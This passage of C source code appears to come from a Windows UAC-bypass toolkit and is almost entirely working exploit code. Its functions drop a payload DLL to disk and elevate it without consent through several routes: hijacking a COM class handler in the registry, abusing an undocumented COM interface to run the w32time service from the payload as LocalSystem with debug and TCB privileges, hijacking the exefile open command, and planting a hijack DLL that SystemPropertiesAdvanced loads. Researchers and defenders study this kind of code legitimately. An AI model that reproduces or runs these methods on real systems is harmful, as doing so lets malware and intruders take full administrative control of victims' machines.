(WaitForSingleObject(shinfo.hProcess, 5000) == WAIT_TIMEOUT) NtTerminateProcess(shinfo.hProcess, STATUS_SUCCESS); NtClose(shinfo.hProcess); if (bNeedCleanup) { RegDeleteValue(hKey, TEXT("")); RegFlushKey(hKey); } MethodResult = STATUS_SUCCESS; } RegCloseKey(hKey); } #ifndef _WIN64 if (g_ctx->IsWow64) { supEnableDisableWow64Redirection(FALSE); } #endif return MethodResult; } /* * ucmCOMHandlersMethod2 * * Purpose: * * Bypass UAC using fake COM class handler. * https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-bypass-UAC/ * https://offsec.provadys.com/UAC-bypass-dotnet.html * * Produced mixed results since Windows 10 RS4. * */ NTSTATUS ucmCOMHandlersMethod2( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; BOOL bNeedCleanup = FALSE, bRemoveFile = FALSE; DWORD cbData = 0; LRESULT lResult; WCHAR *s, *d; HKEY SourceKey = NULL, DestKey = NULL; WCHAR szBuffer[MAX_PATH * 2], szKey[MAX_PATH * 2]; WCHAR szConvertedName[MAX_PATH * 3]; #ifdef _DEBUG g_ctx->MethodExecuteType = ucmExTypeIndirectModification; #endif do { // // Drop Fujinami to the %temp% // _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, FUJINAMI_DLL); if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize)) break; bRemoveFile = TRUE; // // Copy existing COM handler entry. // _strcpy(szKey, TEXT("CLSID\\")); _strcat(szKey, T_MMCFrameworkSnapInFactory); lResult = RegOpenKeyEx(HKEY_CLASSES_ROOT, szKey, 0, KEY_READ, &SourceKey); if (lResult != ERROR_SUCCESS) break; _strcpy(szKey, T_REG_SOFTWARECLASSESCLSID); _strcat(szKey, T_MMCFrameworkSnapInFactory); lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szKey, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &DestKey, NULL); if (lResult != ERROR_SUCCESS) break; bNeedCleanup = TRUE; lResult = RegCopyTree(SourceKey, NULL, DestKey); if (lResult != ERROR_SUCCESS) break; RegCloseKey(SourceKey); SourceKey = NULL; RegCloseKey(DestKey); DestKey = NULL; // // Modify entry. // _strcpy(szKey, T_REG_SOFTWARECLASSESCLSID); _strcat(szKey, T_MMCFrameworkSnapInFactory); _strcat(szKey, T_REG_INPROCSERVER32); lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szKey, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &SourceKey, NULL); if (lResult != ERROR_SUCCESS) break; // // Set Assembly value. // cbData = (DWORD)((1 + _strlen(T_FUJINAMI_ASSEMBLY)) * sizeof(WCHAR)); lResult = RegSetValueEx( SourceKey, T_ASSEMBLY, 0, REG_SZ, (BYTE*)T_FUJINAMI_ASSEMBLY, cbData); if (lResult != ERROR_SUCCESS) break; // // Set Class value. // cbData = (DWORD)((1 + _strlen(T_FUJINAMI_CLASS)) * sizeof(WCHAR)); lResult = RegSetValueEx( SourceKey, T_CLASS, 0, REG_SZ, (BYTE*)T_FUJINAMI_CLASS, cbData); if (lResult != ERROR_SUCCESS) break; // // Set CodeBase value. // RtlSecureZeroMemory(szConvertedName, sizeof(szConvertedName)); _strcpy(szConvertedName, T_FILE_PREP); s = szBuffer; d = _strend(szConvertedName); while (*s != 0) { if (*s == L'\\') { *d = L'/'; d++; *d = L'/'; d++; } else { *d = *s; d++; } s++; } lResult = ERROR_ACCESS_DENIED; switch (g_ctx->MethodExecuteType) { case ucmExTypeIndirectModification: if (supIndirectRegAdd(REG_HKCU, szKey, T_CODEBASE, T_REG_SZ, szConvertedName)) { lResult = ERROR_SUCCESS; } break; case ucmExTypeDefault: default: cbData = (DWORD)((1 + _strlen(szConvertedName)) * sizeof(WCHAR)); lResult = RegSetValueEx( SourceKey, T_CODEBASE, 0, REG_SZ, (BYTE*)szConvertedName, cbData); break; } if (lResult != ERROR_SUCCESS) break; RegCloseKey(SourceKey); SourceKey = NULL; _strcpy(szKey, T_REG_SOFTWARECLASSESCLSID); _strcat(szKey, T_MMCFrameworkSnapInFactory); _strcat(szKey, T_REG_INPROCSERVER32); _strcat(szKey, TEXT("\\")); lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szKey, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &SourceKey, NULL); if (lResult != ERROR_SUCCESS) break; lResult = ERROR_ACCESS_DENIED; switch (g_ctx->MethodExecuteType) { case ucmExTypeIndirectModification: if (supIndirectRegAdd(REG_HKCU, szKey, T_CODEBASE, T_REG_SZ, szConvertedName)) { lResult = ERROR_SUCCESS; } break; case ucmExTypeDefault: default: // // Set CodeBase value. // cbData unchanged. // lResult = RegSetValueEx( SourceKey, T_CODEBASE, 0, REG_SZ, (BYTE*)szConvertedName, cbData); break; } if (lResult != ERROR_SUCCESS) break; // // Set Assembly value. // cbData = (DWORD)((1 + _strlen(T_FUJINAMI_ASSEMBLY)) * sizeof(WCHAR)); lResult = RegSetValueEx( SourceKey, T_ASSEMBLY, 0, REG_SZ, (BYTE*)T_FUJINAMI_ASSEMBLY, cbData); if (lResult != ERROR_SUCCESS) break; // // Set Class value. // cbData = (DWORD)((1 + _strlen(T_FUJINAMI_CLASS)) * sizeof(WCHAR)); lResult = RegSetValueEx( SourceKey, T_CLASS, 0, REG_SZ, (BYTE*)T_FUJINAMI_CLASS, cbData); if (lResult != ERROR_SUCCESS) break; RegCloseKey(SourceKey); SourceKey = NULL; // // Run target. // if (supRunProcess(MMC_EXE, EVENTVWR_MSC)) MethodResult = STATUS_SUCCESS; } while (FALSE); if (SourceKey != NULL) RegCloseKey(SourceKey); if (DestKey != NULL) RegCloseKey(DestKey); if (bNeedCleanup) { _strcpy(szKey, T_REG_SOFTWARECLASSESCLSID); _strcat(szKey, T_MMCFrameworkSnapInFactory); supRegDeleteKeyRecursive(HKEY_CURRENT_USER, szKey); } if (bRemoveFile) { _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, FUJINAMI_DLL); DeleteFile(szBuffer); } return MethodResult; } /* * ucmxSetResetW32TimeSvcParams * * Purpose: * * Set or reset to original w32time service params. * */ BOOL ucmxSetResetW32TimeSvcParams( _In_ ISLLUACOM *SPLuaObject, _In_opt_ LPWSTR lpServiceDll, _In_ BOOL Set ) { HRESULT hr; PWSTR Ptr; PWSTR RequiredPrivileges = L"SeAssignPrimaryTokenPrivilege\0SeImpersonatePrivilege\0SeDebugPrivilege\0SeTcbPrivilege\0\0"; PWSTR RequiredPrivilegesDefault = L"SeAuditPrivilege\0SeChangeNotifyPrivilege\0SeCreateGlobalPrivilege\0SeSystemTimePrivilege\0\0"; PWSTR PrivSet, pServiceDll, pImagePath; ULONG DataSize, Length, ServiceType; WCHAR szLocal[MAX_PATH], szServiceDll[MAX_PATH]; RtlSecureZeroMemory(szLocal, sizeof(szLocal)); RtlSecureZeroMemory(szServiceDll, sizeof(szServiceDll)); if (Set) { if (lpServiceDll == NULL) return FALSE; pServiceDll = lpServiceDll; PrivSet = RequiredPrivileges; _strcpy(szLocal, OBJECT_LOCALSYSTEM); } else { _strcpy(szServiceDll, L"%systemroot%\\system32\\w32time.dll"); pServiceDll = szServiceDll; PrivSet = RequiredPrivilegesDefault; _strcpy(szLocal, OBJECT_LOCALSERVICE); } // // Set RequiredPrivileges. // Ptr = PrivSet; DataSize = 0; while (*Ptr) { Length = (ULONG)_strlen(Ptr) + 1; Ptr = Ptr + Length; DataSize += Length; } DataSize = (DataSize * sizeof(WCHAR)) + sizeof(UNICODE_NULL); hr = ucmSPLUAObjectRegSetValue( SPLuaObject, SSLUA_HKEY_LOCAL_MACHINE, W32TIME_SERVICE_PATH, SVC_REQ_PRIVS, REG_MULTI_SZ, PrivSet, DataSize); if (SUCCEEDED(hr)) { // // Set ObjectName. // DataSize = (ULONG)((1 + _strlen(szLocal)) * sizeof(WCHAR)); hr = ucmSPLUAObjectRegSetValue( SPLuaObject, SSLUA_HKEY_LOCAL_MACHINE, W32TIME_SERVICE_PATH, SVC_OBJECT_NAME, REG_SZ, szLocal, DataSize); if (SUCCEEDED(hr)) { // // Set ServiceDll. // if (g_ctx->dwBuildNumber >= 10240) { DataSize = (ULONG)((1 + _strlen(pServiceDll)) * sizeof(WCHAR)); hr = ucmSPLUAObjectRegSetValue( SPLuaObject, SSLUA_HKEY_LOCAL_MACHINE, W32TIME_SERVICE_PARAMETERS, SVC_SERVICE_DLL, REG_EXPAND_SZ, pServiceDll, DataSize); } } } // // Running in EXE mode. // if (g_ctx->dwBuildNumber <= 9600) { if (Set) { ServiceType = SERVICE_WIN32_OWN_PROCESS; pImagePath = pServiceDll; } else { ServiceType = SERVICE_WIN32_SHARE_PROCESS; pImagePath = L"%SystemRoot%\\system32\\svchost.exe -k LocalService"; } // // Set service type. // DataSize = sizeof(ULONG); hr = ucmSPLUAObjectRegSetValue( SPLuaObject, SSLUA_HKEY_LOCAL_MACHINE, W32TIME_SERVICE_PATH, SVC_TYPE, REG_DWORD, (PVOID)&ServiceType, DataSize); if (SUCCEEDED(hr)) { // // Set service imagepath. // DataSize = (ULONG)((1 + _strlen(pImagePath)) * sizeof(WCHAR)); hr = ucmSPLUAObjectRegSetValue( SPLuaObject, SSLUA_HKEY_LOCAL_MACHINE, W32TIME_SERVICE_PATH, SVC_IMAGE_PATH, REG_EXPAND_SZ, pImagePath, DataSize); } } return SUCCEEDED(hr); } /* * ucmxTrackService * * Purpose: * * Track service state. * */ DWORD ucmxTrackService() { SC_HANDLE schManager, schService; SERVICE_STATUS_PROCESS Status; ULONG dummy, svcstate = 0; schManager = OpenSCManager( NULL, NULL, SC_MANAGER_CONNECT); if (schManager) { schService = OpenService( schManager, W32TIME_SERVICE_NAME, SERVICE_QUERY_STATUS); if (schService) { if (QueryServiceStatusEx( schService, SC_STATUS_PROCESS_INFO, (LPBYTE)&Status, sizeof(Status), &dummy)) { svcstate = Status.dwCurrentState; } CloseServiceHandle(schService); } CloseServiceHandle(schManager); } return svcstate; } /* * ucmDateTimeStateWriterMethod * * Purpose: * * Exploit IDateTimeStateWriter undocumented COM interface which allows * elevated start/stop control over w32time service. * * Used in with deroko method which provide elevated RegSetValueEx functionality. * * Fixed in Windows 10 RS5. * */ NTSTATUS ucmDateTimeStateWriterMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; ULONG I, svcstate; HRESULT hr, hr_init; HANDLE hSvcStopEvent = NULL; IDateTimeStateWriter *Dtsw = NULL; ISLLUACOM *SPLuaObject = NULL; UNICODE_STRING usSignalEvent = RTL_CONSTANT_STRING(SIGNAL_OBJECT); OBJECT_ATTRIBUTES obja; LARGE_INTEGER liDueTime; WCHAR szServiceBinary[MAX_PATH * 2]; RtlSecureZeroMemory(szServiceBinary, sizeof(szServiceBinary)); // // Drop payload to %temp%. // if (g_ctx->dwBuildNumber >= 10240) { _strcpy(szServiceBinary, g_ctx->szTempDirectory); _strcat(szServiceBinary, W32TIME_DLL); if (!supWriteBufferToFile(szServiceBinary, ProxyDll, ProxyDllSize)) return MethodResult; } else { if (supReplaceDllEntryPoint( ProxyDll, ProxyDllSize, CHIYODA_EXT_ENTRYPOINT, TRUE) == FALSE) { return MethodResult; } _strcpy(szServiceBinary, g_ctx->szTempDirectory); _strcat(szServiceBinary, MYSTERIOUSCUTETHING); _strcat(szServiceBinary, L".exe"); if (!supWriteBufferToFile(szServiceBinary, ProxyDll, ProxyDllSize)) return MethodResult; } hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); do { // // Create ping back notification event in nonsignaled state. // InitializeObjectAttributes(&obja, &usSignalEvent, OBJ_CASE_INSENSITIVE, NULL, NULL); if (!NT_SUCCESS(NtCreateEvent( &hSvcStopEvent, EVENT_ALL_ACCESS, &obja, NotificationEvent, FALSE))) { break; } // // Allocate SPLuaObject. // hr = ucmAllocateElevatedObject( T_CLSID_SPPLUAObject, &IID_ISPPLUAObject, CLSCTX_LOCAL_SERVER, &SPLuaObject); if (hr != S_OK) break; // // Allocate DateTimeStateWriter. // hr = ucmAllocateElevatedObject( T_CLSID_DateTimeStateWriter, &IID_DateTimeStateWriter, CLSCTX_LOCAL_SERVER, &Dtsw); if (hr != S_OK) break; // // Stop and Disable w32time. // hr = Dtsw->lpVtbl->StopAndDisableService(Dtsw); if (hr != S_OK) break; Sleep(1000); if (!ucmxSetResetW32TimeSvcParams( SPLuaObject, szServiceBinary, TRUE)) { break; } I = 5; do { supDbgMsg(L"app>>svc start try"); hr = Dtsw->lpVtbl->StartServiceAndRefresh(Dtsw, 0); if (hr != S_OK) break; svcstate = ucmxTrackService(); if ((svcstate == SERVICE_RUNNING) || (svcstate == SERVICE_START_PENDING)) { supDbgMsg(L"app>>started"); break; } Sleep(1000); --I; } while (I); if (FAILED(hr)) { supDbgMsg(L"app>>StartServiceAndRefresh failed"); ucmxSetResetW32TimeSvcParams(SPLuaObject, NULL, FALSE); break; } MethodResult = STATUS_SUCCESS; // // Wait some time for ping back. // We can't exit without ping back because: // - IPC link will be destroyed // - Payload cannot normally run // supDbgMsg(L"app>>waiting for an event\r\n"); liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(20000, 10000); NtWaitForSingleObject(hSvcStopEvent, FALSE, &liDueTime); supDbgMsg(L"app>>wait complete\r\n"); } while (FALSE); if (hSvcStopEvent) NtClose(hSvcStopEvent); if (SPLuaObject) SPLuaObject->lpVtbl->Release(SPLuaObject); if (Dtsw) Dtsw->lpVtbl->Release(Dtsw); if (hr_init == S_OK) CoUninitialize(); DeleteFile(szServiceBinary); return MethodResult; } /* * ucmAcCplAdminMethod * * Purpose: * * Bypass UAC using registry HKCU\Software\Classes\exefile\shell\open hijack and AccessibilityCplAdmin elevated launch. * * Fixed in Windows 10 RS4 * */ NTSTATUS ucmAcCplAdminMethod( _In_ LPWSTR lpszPayload ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; BOOL bValueSet = FALSE; IAccessibilityCplAdmin *AdminElevate = NULL; HRESULT hr = E_FAIL, hr_init; HKEY hKey = NULL; DWORD cbData = 0, dwDisposition = 0; WCHAR szKeyName[MAX_PATH]; hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); _strcpy(szKeyName, T_EXEFILE_SHELL); _strcat(szKeyName, T_SHELL_OPEN_COMMAND); hr = ucmAllocateElevatedObject( T_CLSID_AcCplAdmin, &IID_IAccessibilityCplAdmin, CLSCTX_LOCAL_SERVER, &AdminElevate); if (SUCCEEDED(hr)) { if (ERROR_SUCCESS == RegCreateKeyEx( HKEY_CURRENT_USER, szKeyName, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, &dwDisposition)) { cbData = (DWORD)((1 + _strlen(lpszPayload)) * sizeof(WCHAR)); if (ERROR_SUCCESS == RegSetValueEx( hKey, TEXT(""), 0, REG_SZ, (BYTE*)lpszPayload, cbData)) { RegFlushKey(hKey); RegCloseKey(hKey); bValueSet = TRUE; hr = AdminElevate->lpVtbl->LinktoSystemRestorePoint(AdminElevate); if (SUCCEEDED(hr)) MethodResult = STATUS_SUCCESS; } else { RegCloseKey(hKey); } } AdminElevate->lpVtbl->Release(AdminElevate); } if (dwDisposition == REG_CREATED_NEW_KEY) { supRegDeleteKeyRecursive( HKEY_CURRENT_USER, T_EXEFILE_SHELL); } else { if (bValueSet) { supDeleteKeyValueAndFlushKey( HKEY_CURRENT_USER, szKeyName, TEXT("")); } } if (hr_init == S_OK) CoUninitialize(); return MethodResult; } /* * ucmEgre55Method * * Purpose: * * Bypass UAC by DLL hijack of SystemProperties* commands. * Original author link: https://egre55.github.io/system-properties-uac-bypass/ * * Note: * * This code expects to work under wow64 only because of uacme restrictions. * However you can extent it to force drop your *32* bit dll from your *64* bit application. * * Fixed in Windows 10 19H1 * */ NTSTATUS ucmEgre55Method( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize ) { NTSTATUS MethodResult = STATUS_ACCESS_DENIED; PWSTR pTmp = NULL, lpDest = NULL; SIZE_T Length; WCHAR szBuffer[MAX_PATH * 2]; do { if (FAILED(SHGetKnownFolderPath(&FOLDERID_LocalAppData, KF_FLAG_DEFAULT, NULL, (PWSTR*)&pTmp))) break; Length = _strlen(pTmp); if (Length == 0) break; Length = (MAX_PATH + Length) * sizeof(WCHAR); lpDest = (PWSTR)supHeapAlloc(Length); if (lpDest == NULL) break; _strcpy(lpDest, pTmp); _strcat(lpDest, TEXT("\\Microsoft\\WindowsApps\\")); _strcat(lpDest, SRRSTR_DLL); if (!supWriteBufferToFile(lpDest, ProxyDll, ProxyDllSize)) break; _strcpy(szBuffer, g_ctx->szSystemDirectory); _strcat(szBuffer, SYSTEMROPERTIESADVANCED_EXE); if (supRunProcess(szBuffer, NULL)) MethodResult = STATUS_SUCCESS; DeleteFile(lpDest); } while (FALSE); if (pTmp) CoTaskMemFree((LPVOID)pTmp); if (lpDest) supHeapFree(lpDest); return MethodResult; }